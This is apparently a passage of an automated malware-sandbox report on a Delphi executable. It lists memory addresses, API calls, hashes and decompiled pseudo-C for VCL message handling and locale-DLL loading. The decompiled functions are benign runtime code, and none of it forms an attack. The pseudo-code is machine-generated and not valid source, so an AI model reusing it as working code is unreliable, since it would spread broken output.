                                                                                0x00405ddf
                                                                                0x00405de4
                                                                                0x00405de3
                                                                                0x00405de3
                                                                                0x00405df3
                                                                                0x00405dfb
                                                                                0x00405e01
                                                                                0x00405e06
                                                                                0x00405e13
                                                                                0x00405e17
                                                                                0x00405e18
                                                                                0x00405e19
                                                                                0x00405e2e
                                                                                0x00405e2e
                                                                                0x00405e32
                                                                                0x00405e4b
                                                                                0x00405e4f
                                                                                0x00405e50
                                                                                0x00405e51
                                                                                0x00405e61
                                                                                0x00405e66
                                                                                0x00405e6a
                                                                                0x00405e6c
                                                                                0x00405e81
                                                                                0x00405e85
                                                                                0x00405e86
                                                                                0x00405e87
                                                                                0x00405e97
                                                                                0x00405e9c
                                                                                0x00405e9c
                                                                                0x00405e6a
                                                                                0x00405e32
                                                                                0x00405dfb
                                                                                0x00405ea5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405cf5
                                                                                0x00405cd7

                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0046B08C,?,00405A68,00400000,?,00000105,00000001,004103FC,00405AA4,00406550,0000FF98,?), ref: 00405C94
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0046B08C,?,00405A68,00400000,?,00000105,00000001), ref: 00405CB2
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0046B08C), ref: 00405CD0
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405CEE
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405D37
                                                                                • RegQueryValueExA.ADVAPI32(?,00405EE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405D7D,?,80000001), ref: 00405D55
                                                                                • RegCloseKey.ADVAPI32(?,00405D84,00000000,00000000,00000005,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D77
                                                                                • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405D94
                                                                                • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DA1
                                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DA7
                                                                                • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DD2
                                                                                • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E19
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E29
                                                                                • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E51
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E61
                                                                                • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405E87
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405E97
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                • API String ID: 1759228003-2375825460
                                                                                • Opcode ID: 3911d75fb344ff54600c729ed1e39e570585950d4f09cac6ef099054284f545c
                                                                                • Instruction ID: 50d7fcff162f8a2787b95d462eaa17d1600671633a99a01d037d82dc5577e201
                                                                                • Opcode Fuzzy Hash: 3911d75fb344ff54600c729ed1e39e570585950d4f09cac6ef099054284f545c
                                                                                • Instruction Fuzzy Hash: 11514B71A4060C7AFB25D6A4CC46FEF76ACDB04744F4040B7BA44F65C1EA789A448FA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004548A0, Relevance: 28.4, APIs: 13, Strings: 3, Instructions: 392COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 94%
                                                                                			E004548A0(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t161;
				struct HWND__* _t162;
				struct HWND__* _t163;
				void* _t166;
				struct HWND__* _t176;
				struct HWND__* _t185;
				struct HWND__* _t188;
				struct HWND__* _t189;
				struct HWND__* _t191;
				struct HWND__* _t197;
				struct HWND__* _t199;
				struct HWND__* _t202;
				struct HWND__* _t205;
				struct HWND__* _t206;
				struct HWND__* _t216;
				struct HWND__* _t217;
				struct HWND__* _t222;
				struct HWND__* _t224;
				struct HWND__* _t227;
				struct HWND__* _t231;
				struct HWND__* _t245;
				struct HWND__* _t249;
				struct HWND__* _t251;
				struct HWND__* _t252;
				struct HWND__* _t264;
				intOrPtr _t267;
				struct HWND__* _t270;
				intOrPtr* _t271;
				struct HWND__* _t279;
				struct HWND__* _t281;
				struct HWND__* _t292;
				void* _t301;
				signed int _t303;
				struct HWND__* _t309;
				struct HWND__* _t310;
				struct HWND__* _t311;
				void* _t312;
				intOrPtr _t335;
				struct HWND__* _t339;
				intOrPtr _t361;
				void* _t365;
				struct HWND__* _t370;
				void* _t371;
				void* _t372;
				intOrPtr _t373;

				_t312 = __ecx;
				_push(_t365);
				_v12 = __edx;
				_v8 = __eax;
				_push(_t372);
				_push(0x454f30);
				_push( *[fs:edx]);
				 *[fs:edx] = _t373;
				 *(_v12 + 0xc) = 0;
				_t301 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
				if(_t301 < 0) {
					L5:
					E00454754(_v8, _t312, _v12);
					_t303 =  *_v12;
					_t161 = _t303;
					__eflags = _t161 - 0x53;
					if(__eflags > 0) {
						__eflags = _t161 - 0xb017;
						if(__eflags > 0) {
							__eflags = _t161 - 0xb020;
							if(__eflags > 0) {
								_t162 = _t161 - 0xb031;
								__eflags = _t162;
								if(_t162 == 0) {
									_t163 = _v12;
									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
									if( *((intOrPtr*)(_t163 + 4)) != 1) {
										 *(_v8 + 0xb0) =  *(_v12 + 8);
									} else {
										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
									}
									L99:
									_t166 = 0;
									_pop(_t335);
									 *[fs:eax] = _t335;
									goto L100;
								}
								__eflags = _t162 + 0xfffffff2 - 2;
								if(_t162 + 0xfffffff2 - 2 < 0) {
									 *(_v12 + 0xc) = E004567F8(_v8,  *(_v12 + 8), _t303) & 0x0000007f;
								} else {
									L98:
									E00454818(_t372); // executed
								}
								goto L99;
							}
							if(__eflags == 0) {
								_t176 = _v12;
								__eflags =  *(_t176 + 4);
								if( *(_t176 + 4) != 0) {
									E0045549C(_v8, _t312,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								} else {
									E00455440(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								}
								goto L99;
							}
							_t185 = _t161 - 0xb01a;
							__eflags = _t185;
							if(_t185 == 0) {
								_t188 = IsIconic( *(_v8 + 0x30));
								__eflags = _t188;
								if(_t188 == 0) {
									_t189 = GetFocus();
									_t339 = _v8;
									__eflags = _t189 -  *((intOrPtr*)(_t339 + 0x30));
									if(_t189 ==  *((intOrPtr*)(_t339 + 0x30))) {
										_t191 = E0044C7E0(0);
										__eflags = _t191;
										if(_t191 != 0) {
											SetFocus(_t191);
										}
									}
								}
								goto L99;
							}
							__eflags = _t185 == 5;
							if(_t185 == 5) {
								L88:
								E00455980(_v8,  *(_v12 + 8),  *(_v12 + 4));
								goto L99;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_t197 =  *(_v8 + 0x44);
							__eflags = _t197;
							if(_t197 != 0) {
								_t367 = _t197;
								_t199 = E0043BD14(_t197);
								__eflags = _t199;
								if(_t199 != 0) {
									_t202 = IsWindowEnabled(E0043BD14(_t367));
									__eflags = _t202;
									if(_t202 != 0) {
										_t205 = IsWindowVisible(E0043BD14(_t367));
										__eflags = _t205;
										if(_t205 != 0) {
											 *0x46bb18 = 0;
											_t206 = GetFocus();
											SetFocus(E0043BD14(_t367));
											E00436848(_t367,  *(_v12 + 4), 0x112,  *(_v12 + 8));
											SetFocus(_t206);
											 *0x46bb18 = 1;
											 *(_v12 + 0xc) = 1;
										}
									}
								}
							}
							goto L99;
						}
						__eflags = _t161 - 0xb000;
						if(__eflags > 0) {
							_t216 = _t161 - 0xb001;
							__eflags = _t216;
							if(_t216 == 0) {
								_t217 = _v8;
								__eflags =  *((short*)(_t217 + 0xf2));
								if( *((short*)(_t217 + 0xf2)) != 0) {
									 *((intOrPtr*)(_v8 + 0xf0))();
								}
								goto L99;
							}
							__eflags = _t216 == 0x15;
							if(_t216 == 0x15) {
								_t222 = E00455318(_v8, _t312, _v12);
								__eflags = _t222;
								if(_t222 != 0) {
									 *(_v12 + 0xc) = 1;
								}
								goto L99;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_t224 = _v8;
							__eflags =  *((short*)(_t224 + 0xfa));
							if( *((short*)(_t224 + 0xfa)) != 0) {
								 *((intOrPtr*)(_v8 + 0xf8))();
							}
							goto L99;
						}
						_t227 = _t161 - 0x112;
						__eflags = _t227;
						if(_t227 == 0) {
							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
							__eflags = _t231;
							if(_t231 == 0) {
								E00454F94(_v8);
							} else {
								__eflags = _t231 == 0x100;
								if(_t231 == 0x100) {
									E00455044(_v8);
								} else {
									E00454818(_t372);
								}
							}
							goto L99;
						}
						__eflags = _t227 + 0xffffffe0 - 7;
						if(_t227 + 0xffffffe0 - 7 < 0) {
							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t303 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
							goto L99;
						} else {
							goto L98;
						}
					}
					if(__eflags == 0) {
						goto L88;
					}
					__eflags = _t161 - 0x16;
					if(__eflags > 0) {
						__eflags = _t161 - 0x1d;
						if(__eflags > 0) {
							_t245 = _t161 - 0x37;
							__eflags = _t245;
							if(_t245 == 0) {
								 *(_v12 + 0xc) = E00454F78(_v8);
								goto L99;
							}
							__eflags = _t245 == 0x13;
							if(_t245 == 0x13) {
								_t249 = _v12;
								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t249 + 8)))) - 0xde534454;
								if( *((intOrPtr*)( *((intOrPtr*)(_t249 + 8)))) == 0xde534454) {
									_t251 = _v8;
									__eflags =  *((char*)(_t251 + 0x9e));
									if( *((char*)(_t251 + 0x9e)) != 0) {
										_t252 = _v8;
										__eflags =  *(_t252 + 0xa0);
										if( *(_t252 + 0xa0) != 0) {
											 *(_v12 + 0xc) = 0;
										} else {
											_t309 = E0040BAFC("vcltest3.dll", _t303, 0x8000);
											 *(_v8 + 0xa0) = _t309;
											__eflags = _t309;
											if(_t309 == 0) {
												 *(_v12 + 0xc) = GetLastError();
												 *(_v8 + 0xa0) = 0;
											} else {
												 *(_v12 + 0xc) = 0;
												_t370 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
												_t310 = _t370;
												__eflags = _t370;
												if(_t370 != 0) {
													_t264 =  *(_v12 + 8);
													_t310->i( *((intOrPtr*)(_t264 + 4)),  *((intOrPtr*)(_t264 + 8)));
												}
											}
										}
									}
								}
								goto L99;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_t267 =  *0x487c00; // 0x2290f1c
							E00453DBC(_t267);
							E00454818(_t372);
							goto L99;
						}
						_t270 = _t161 - 0x1a;
						__eflags = _t270;
						if(_t270 == 0) {
							_t271 =  *0x486d80; // 0x487b64
							E00440560( *_t271, _t312,  *(_v12 + 4));
							E004547AC(_v8, _t303, _t312, _v12, _t365);
							E00454818(_t372);
							goto L99;
						}
						__eflags = _t270 == 2;
						if(_t270 == 2) {
							E00454818(_t372);
							_t279 = _v12;
							__eflags =  *((intOrPtr*)(_t279 + 4)) - 1;
							asm("sbb eax, eax");
							 *((char*)(_v8 + 0x9d)) = _t279 + 1;
							_t281 = _v12;
							__eflags =  *(_t281 + 4);
							if( *(_t281 + 4) == 0) {
								E004546A8();
								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
							} else {
								E004546B8(_v8);
								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
							}
							goto L99;
						} else {
							goto L98;
						}
					}
					if(__eflags == 0) {
						_t292 = _v12;
						__eflags =  *(_t292 + 4);
						if( *(_t292 + 4) != 0) {
							 *((char*)(_v8 + 0x9c)) = 1;
						}
						goto L99;
					}
					__eflags = _t161 - 0x14;
					if(_t161 > 0x14) {
						goto L98;
					}
					switch( *((intOrPtr*)(_t161 * 4 +  &M00454944))) {
						case 0:
							__eax = E0041B790();
							goto L99;
						case 1:
							goto L98;
						case 2:
							_push(0);
							_push(0);
							_push(0xb01a);
							_v8 =  *(_v8 + 0x30);
							_push( *(_v8 + 0x30));
							L00407040();
							__eax = E00454818(__ebp);
							goto L99;
						case 3:
							__eax = _v12;
							__eflags =  *(__eax + 4);
							if( *(__eax + 4) == 0) {
								__eax = E00454818(__ebp);
								__eax = _v8;
								__eflags =  *(__eax + 0xac);
								if( *(__eax + 0xac) == 0) {
									__eax = _v8;
									__eax =  *(_v8 + 0x30);
									__eax = E0044C690( *(_v8 + 0x30), __ebx, __edi, __esi);
									__edx = _v8;
									 *(_v8 + 0xac) = __eax;
								}
								_v8 = L004546B0();
							} else {
								_v8 = E004546B8(_v8);
								__eax = _v8;
								__eax =  *(_v8 + 0xac);
								__eflags = __eax;
								if(__eax != 0) {
									__eax = _v8;
									__edx = 0;
									__eflags = 0;
									 *(_v8 + 0xac) = 0;
								}
								__eax = E00454818(__ebp);
							}
							goto L99;
						case 4:
							__eax = _v8;
							__eax =  *(_v8 + 0x30);
							_push(__eax);
							L00406FA0();
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E00454818(__ebp);
							} else {
								__eax = E00454854(__ebp);
							}
							goto L99;
						case 5:
							__eax = _v8;
							__eax =  *(_v8 + 0x44);
							__eflags = __eax;
							if(__eax != 0) {
								__eax = E00452024(__eax, __ecx);
							}
							goto L99;
						case 6:
							__eax = _v12;
							 *_v12 = 0x27;
							__eax = E00454818(__ebp);
							goto L99;
					}
				} else {
					_t311 = _t301 + 1;
					_t371 = 0;
					L2:
					L2:
					if( *((intOrPtr*)(E00413FA4( *((intOrPtr*)(_v8 + 0xa8)), _t371)))() == 0) {
						goto L4;
					} else {
						_t166 = 0;
						_pop(_t361);
						 *[fs:eax] = _t361;
					}
					L100:
					return _t166;
					L4:
					_t371 = _t371 + 1;
					_t311 = _t311 - 1;
					__eflags = _t311;
					if(_t311 != 0) {
						goto L2;
					}
					goto L5;
				}
			}





















































                                                                                0x004548a0
                                                                                0x004548a7
                                                                                0x004548a9
                                                                                0x004548ac
                                                                                0x004548b1
                                                                                0x004548b2
                                                                                0x004548b7
                                                                                0x004548ba
                                                                                0x004548c2
                                                                                0x004548d1
                                                                                0x004548d4
                                                                                0x00454908
                                                                                0x0045490e
                                                                                0x00454916
                                                                                0x00454918
                                                                                0x0045491a
                                                                                0x0045491d
                                                                                0x004549d1
                                                                                0x004549d6
                                                                                0x00454a1c
                                                                                0x00454a21
                                                                                0x00454a42
                                                                                0x00454a42
                                                                                0x00454a47
                                                                                0x00454eb4
                                                                                0x00454eb7
                                                                                0x00454ebb
                                                                                0x00454ed7
                                                                                0x00454ebd
                                                                                0x00454ec9
                                                                                0x00454ec9
                                                                                0x00454f26
                                                                                0x00454f26
                                                                                0x00454f28
                                                                                0x00454f2b
                                                                                0x00000000
                                                                                0x00454f2b
                                                                                0x00454a50
                                                                                0x00454a53
                                                                                0x00454d12
                                                                                0x00454a59
                                                                                0x00454f1f
                                                                                0x00454f20
                                                                                0x00454f25
                                                                                0x00000000
                                                                                0x00454a53
                                                                                0x00454a23
                                                                                0x00454e7e
                                                                                0x00454e81
                                                                                0x00454e85
                                                                                0x00454ead
                                                                                0x00454e87
                                                                                0x00454e95
                                                                                0x00454e95
                                                                                0x00000000
                                                                                0x00454e85
                                                                                0x00454a29
                                                                                0x00454a29
                                                                                0x00454a2e
                                                                                0x00454e2c
                                                                                0x00454e31
                                                                                0x00454e33
                                                                                0x00454e39
                                                                                0x00454e3e
                                                                                0x00454e41
                                                                                0x00454e44
                                                                                0x00454e4c
                                                                                0x00454e51
                                                                                0x00454e53
                                                                                0x00454e5a
                                                                                0x00454e5a
                                                                                0x00454e53
                                                                                0x00454e44
                                                                                0x00000000
                                                                                0x00454e33
                                                                                0x00454a34
                                                                                0x00454a37
                                                                                0x00454e64
                                                                                0x00454e74
                                                                                0x00000000
                                                                                0x00454a3d
                                                                                0x00000000
                                                                                0x00454a3d
                                                                                0x00454a37
                                                                                0x004549d8
                                                                                0x00454d3f
                                                                                0x00454d42
                                                                                0x00454d44
                                                                                0x00454d4a
                                                                                0x00454d4e
                                                                                0x00454d53
                                                                                0x00454d55
                                                                                0x00454d63
                                                                                0x00454d68
                                                                                0x00454d6a
                                                                                0x00454d78
                                                                                0x00454d7d
                                                                                0x00454d7f
                                                                                0x00454d85
                                                                                0x00454d8c
                                                                                0x00454d9b
                                                                                0x00454db4
                                                                                0x00454dba
                                                                                0x00454dbf
                                                                                0x00454dc9
                                                                                0x00454dc9
                                                                                0x00454d7f
                                                                                0x00454d6a
                                                                                0x00454d55
                                                                                0x00000000
                                                                                0x00454d44
                                                                                0x004549de
                                                                                0x004549e3
                                                                                0x00454a03
                                                                                0x00454a03
                                                                                0x00454a08
                                                                                0x00454dfd
                                                                                0x00454e00
                                                                                0x00454e08
                                                                                0x00454e1a
                                                                                0x00454e1a
                                                                                0x00000000
                                                                                0x00454e08
                                                                                0x00454a0e
                                                                                0x00454a11
                                                                                0x00454d20
                                                                                0x00454d25
                                                                                0x00454d27
                                                                                0x00454d30
                                                                                0x00454d30
                                                                                0x00000000
                                                                                0x00454a17
                                                                                0x00000000
                                                                                0x00454a17
                                                                                0x00454a11
                                                                                0x004549e5
                                                                                0x00454dd5
                                                                                0x00454dd8
                                                                                0x00454de0
                                                                                0x00454df2
                                                                                0x00454df2
                                                                                0x00000000
                                                                                0x00454de0
                                                                                0x004549eb
                                                                                0x004549eb
                                                                                0x004549f0
                                                                                0x00454a69
                                                                                0x00454a69
                                                                                0x00454a6e
                                                                                0x00454a7c
                                                                                0x00454a70
                                                                                0x00454a70
                                                                                0x00454a75
                                                                                0x00454a89
                                                                                0x00454a77
                                                                                0x00454a94
                                                                                0x00454a99
                                                                                0x00454a75
                                                                                0x00000000
                                                                                0x00454a6e
                                                                                0x004549f5
                                                                                0x004549f8
                                                                                0x00454c21
                                                                                0x00000000
                                                                                0x004549fe
                                                                                0x00000000
                                                                                0x004549fe
                                                                                0x004549f8
                                                                                0x00454923
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00454929
                                                                                0x0045492c
                                                                                0x00454998
                                                                                0x0045499b
                                                                                0x004549ba
                                                                                0x004549ba
                                                                                0x004549bd
                                                                                0x00454aff
                                                                                0x00000000
                                                                                0x00454aff
                                                                                0x004549c3
                                                                                0x004549c6
                                                                                0x00454c45
                                                                                0x00454c4b
                                                                                0x00454c51
                                                                                0x00454c57
                                                                                0x00454c5a
                                                                                0x00454c61
                                                                                0x00454c67
                                                                                0x00454c6a
                                                                                0x00454c71
                                                                                0x00454cf1
                                                                                0x00454c73
                                                                                0x00454c82
                                                                                0x00454c87
                                                                                0x00454c8d
                                                                                0x00454c8f
                                                                                0x00454cd9
                                                                                0x00454ce1
                                                                                0x00454c91
                                                                                0x00454c96
                                                                                0x00454cad
                                                                                0x00454caf
                                                                                0x00454cb1
                                                                                0x00454cb3
                                                                                0x00454cbc
                                                                                0x00454cca
                                                                                0x00454cca
                                                                                0x00454cb3
                                                                                0x00454c8f
                                                                                0x00454c71
                                                                                0x00454c61
                                                                                0x00000000
                                                                                0x004549cc
                                                                                0x00000000
                                                                                0x004549cc
                                                                                0x004549c6
                                                                                0x0045499d
                                                                                0x00454f05
                                                                                0x00454f0a
                                                                                0x00454f10
                                                                                0x00000000
                                                                                0x00454f15
                                                                                0x004549a3
                                                                                0x004549a3
                                                                                0x004549a6
                                                                                0x00454ee5
                                                                                0x00454eec
                                                                                0x00454ef7
                                                                                0x00454efd
                                                                                0x00000000
                                                                                0x00454f02
                                                                                0x004549ac
                                                                                0x004549af
                                                                                0x00454b29
                                                                                0x00454b2f
                                                                                0x00454b32
                                                                                0x00454b36
                                                                                0x00454b3c
                                                                                0x00454b42
                                                                                0x00454b45
                                                                                0x00454b49
                                                                                0x00454b70
                                                                                0x00454b85
                                                                                0x00454b4b
                                                                                0x00454b4e
                                                                                0x00454b63
                                                                                0x00454b63
                                                                                0x00000000
                                                                                0x004549b5
                                                                                0x00000000
                                                                                0x004549b5
                                                                                0x004549af
                                                                                0x0045492e
                                                                                0x00454c29
                                                                                0x00454c2c
                                                                                0x00454c30
                                                                                0x00454c39
                                                                                0x00454c39
                                                                                0x00000000
                                                                                0x00454c30
                                                                                0x00454934
                                                                                0x00454937
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045493d
                                                                                0x00000000
                                                                                0x00454f18
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00454b07
                                                                                0x00454b09
                                                                                0x00454b0b
                                                                                0x00454b13
                                                                                0x00454b16
                                                                                0x00454b17
                                                                                0x00454b1d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00454b8f
                                                                                0x00454b92
                                                                                0x00454b96
                                                                                0x00454bca
                                                                                0x00454bd0
                                                                                0x00454bd3
                                                                                0x00454bda
                                                                                0x00454bdc
                                                                                0x00454bdf
                                                                                0x00454be2
                                                                                0x00454be7
                                                                                0x00454bea
                                                                                0x00454bea
                                                                                0x00454bf3
                                                                                0x00454b98
                                                                                0x00454b9b
                                                                                0x00454ba0
                                                                                0x00454ba3
                                                                                0x00454ba9
                                                                                0x00454bab
                                                                                0x00454bb2
                                                                                0x00454bb5
                                                                                0x00454bb5
                                                                                0x00454bb7
                                                                                0x00454bb7
                                                                                0x00454bbe
                                                                                0x00454bc3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00454ab7
                                                                                0x00454aba
                                                                                0x00454abd
                                                                                0x00454abe
                                                                                0x00454ac3
                                                                                0x00454ac5
                                                                                0x00454ad4
                                                                                0x00454ac7
                                                                                0x00454ac8
                                                                                0x00454acd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00454a9f
                                                                                0x00454aa2
                                                                                0x00454aa5
                                                                                0x00454aa7
                                                                                0x00454aad
                                                                                0x00454aad
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00454adf
                                                                                0x00454ae2
                                                                                0x00454ae9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004548d6
                                                                                0x004548d6
                                                                                0x004548d7
                                                                                0x00000000
                                                                                0x004548d9
                                                                                0x004548f5
                                                                                0x00000000
                                                                                0x004548f7
                                                                                0x004548f7
                                                                                0x004548f9
                                                                                0x004548fc
                                                                                0x004548fc
                                                                                0x00454f45
                                                                                0x00454f4b
                                                                                0x00454904
                                                                                0x00454904
                                                                                0x00454905
                                                                                0x00454905
                                                                                0x00454906
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00454906

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RegisterAutomation$d{H$vcltest3.dll
                                                                                • API String ID: 0-2387504366
                                                                                • Opcode ID: e26ccd446a316f4fbb8a516c3d14ae18cd1f500151cd010e907ea5265a56c9f3
                                                                                • Instruction ID: 8ad9d7c783a2c6ce4ebe263d3ed71b4ee7457bda608aaccbfb27e864ecc426a2
                                                                                • Opcode Fuzzy Hash: e26ccd446a316f4fbb8a516c3d14ae18cd1f500151cd010e907ea5265a56c9f3
                                                                                • Instruction Fuzzy Hash: B5E18F35A04205EFD700DB5DC985A5EB7B0AB8831AF2580A6EC049F753D738EEC9DB49
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405D84, Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 61%
                                                                                			E00405D84() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L00401310();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00401318();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L00401310();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L00401310();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L00401310();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











                                                                                0x00405d84
                                                                                0x00405d8c
                                                                                0x00405d93
                                                                                0x00405d94
                                                                                0x00405da7
                                                                                0x00405dac
                                                                                0x00405db5
                                                                                0x00405e9e
                                                                                0x00405ea5
                                                                                0x00405dcb
                                                                                0x00405dcb
                                                                                0x00405dd1
                                                                                0x00405dd2
                                                                                0x00405ddf
                                                                                0x00405de4
                                                                                0x00405de7
                                                                                0x00405de3
                                                                                0x00000000
                                                                                0x00405de3
                                                                                0x00405df3
                                                                                0x00405dfb
                                                                                0x00405e01
                                                                                0x00405e06
                                                                                0x00405e13
                                                                                0x00405e17
                                                                                0x00405e18
                                                                                0x00405e19
                                                                                0x00405e2e
                                                                                0x00405e2e
